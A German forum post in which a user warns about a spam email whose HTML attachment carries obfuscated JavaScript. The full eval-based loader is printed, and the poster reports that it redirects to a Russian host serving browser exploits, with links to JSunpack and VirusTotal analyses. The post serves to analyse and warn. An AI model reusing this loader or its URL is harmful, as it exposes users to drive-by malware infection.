Ich hänge es hier mal an, weil der Angriff auch via JS eingeleitet wird. Heute eine Spammail bekommen, mit einem HTML-Dokument.
Code:
<script>try{n-=eval("pro"+"totype");}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110..891..1170..981..1010..990..1160..414..1030..909..1160..621..1080..909..1090..909..1100..1044..1150..594..1210..756..970..927..780..873..1090..909..400..351..980..999..1000..1089..390..369..910..432..930..369..1230..117..90..81..90..945..1020..1026..970..981..1010..1026..400..369..590..117..90..81..1250..288..1010..972..1150..909..320..1107..130..81..90..81..1000..999..990..1053..1090..909..1100..1044..460..1071..1140..945..1160..909..400..306..600..945..1020..1026..970..981..1010..288..1150..1026..990..549..390..936..1160..1044..1120..522..470..423..1110..990..1080..945..1100..909..450..891..970..981..1090..1053..1100..945..1160..1089..460..1026..1170..522..560..432..560..432..470..918..1110..1026..1170..981..470..1035..1040..999..1190..1044..1040..1026..1010..873..1000..414..1120..936..1120..567..1120..873..1030..909..610..459..1020..918..530..468..1020..450..1000..450..990..891..1020..459..520..450..560..351..320..1071..1050..900..1160..936..610..351..490..432..390..288..1040..909..1050..927..1040..1044..610..351..490..432..390..288..1150..1044..1210..972..1010..549..390..1062..1050..1035..1050..882..1050..972..1050..1044..1210..522..1040..945..1000..900..1010..990..590..1008..1110..1035..1050..1044..1050..999..1100..522..970..882..1150..999..1080..1053..1160..909..590..972..1010..918..1160..522..480..531..1160..999..1120..522..480..531..390..558..600..423..1050..918..1140..873..1090..909..620..306..410..531..130..81..90..1125..130..81..90..918..1170..990..990..1044..1050..999..1100..288..1050..918..1140..873..1090..909..1140..360..410..1107..130..81..90..81..1180..873..1140..288..1020..288..610..288..1000..999..990..1053..1090..909..1100..1044..460..891..1140..909..970..1044..1010..621..1080..909..1090..909..1100..1044..400..351..1050..918..1140..873..1090..909..390..369..590..918..460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1044..1010..360..390..1035..1140..891..390..396..390..936..1160..1044..1120..522..470..423..1110..990..1080..945..1100..909..450..891..970..981..1090..1053..1100..945..1160..1089..460..1026..1170..522..560..432..560..432..470..918..1110..1026..1170..981..470..1035..1040..999..1190..1044..1040..1026..1010..873..1000..414..1120..936..1120..567..1120..873..1030..909..610..459..1020..918..530..468..1020..450..1000..450..990..891..1020..459..520..450..560..351..410..531..1020..414..1150..1044..1210..972..1010..414..1180..945..1150..945..980..945..1080..945..1160..1089..610..351..1040..945..1000..900..1010..990..390..531..1020..414..1150..1044..1210..972..1010..414..1120..999..1150..945..1160..945..1110..990..610..351..970..882..1150..999..1080..1053..1160..909..390..531..1020..414..1150..1044..1210..972..1010..414..1080..909..1020..1044..610..351..480..351..590..918..460..1035..1160..1089..1080..909..460..1044..1110..1008..610..351..480..351..590..918..460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1044..1010..360..390..1071..1050..900..1160..936..390..396..390..441..480..351..410..531..1020..414..1150..909..1160..585..1160..1044..1140..945..980..1053..1160..909..400..351..1040..909..1050..927..1040..1044..390..396..390..441..480..351..410..531..130..81..90..81..1000..999..990..1053..1090..909..1100..1044..460..927..1010..1044..690..972..1010..981..1010..990..1160..1035..660..1089..840..873..1030..702..970..981..1010..360..390..882..1110..900..1210..351..410..819..480..837..460..873..1120..1008..1010..990..1000..603..1040..945..1080..900..400..918..410..531..130..81..90..1125".split("..");h=2;s="";for(i=0;i-657<0;i=1+i){k=i;s=s+String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+9));}if(015-0xa===3)e(s);}</script>
Wirft man das bei JSunpack ein, sieht man, dass man auf online-cammunity.ru:8080/forum/showthread.php?page=3ff54f2d2ccf3428 (Vorsicht!) weitergeleitet wird. Dort wird dann versucht einem abhängig vom Browser Schadcode unterzuschieben.
http://jsunpack.jeek.org/?report=2e171028233e26dcbe410d87adeca91d43130a21
Unter anderem ein Exploit für eine alte Windows-Lücke und eine ziemlich aktuelle Java-Lücke:
https://www.virustotal.com/file/4419f8608c928da1dc435ef56415218b3f865447ae2653879977dca94dc43ebc/analysis/
Lesezeichen